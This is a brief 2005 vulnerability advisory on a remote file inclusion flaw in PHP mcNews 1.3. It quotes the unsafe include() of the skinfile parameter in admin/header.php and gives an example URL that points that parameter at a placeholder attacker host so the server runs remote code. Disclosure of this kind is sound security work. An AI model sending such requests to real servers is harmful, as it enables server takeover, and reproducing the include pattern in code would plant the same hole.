-- == -- == -- == -- == -- == -- == -- == -- == -- == -- Name: PHP mcNews Version: 1.3 Homepage: http://www.phpforums.net/index.php?dir=dld Author: Filip Groszynski (VXSfx) Date: 7 March 2005 -- == -- == -- == -- == -- == -- == -- == -- == -- == -- Vulnerable code in mcNews/admin/header.php: <? // mcNews 1.3 Marc Cagninacci marc@xxxxxxxxxxxxx ?> ... <? if($voir!='') { $skinfile=strstr($skinfile, 'skin'); include ("$skinfile"); ?> ... -------------------------------------------------------- Example: if register_globals=on and allow_url_fopen=on: http://[victim]/[dir]/mcNews/admin/header.php?skinfile=http://[hacker_box]/ -------------------------------------------------------- Contact: Author: Filip Groszynski <VXSfx> Location: Poland <Warsaw> Email: groszynskif <at> gmail <dot> com HP: http://shell.homeunix.org -- == -- == -- == -- == -- == -- == -- == -- == -- == --
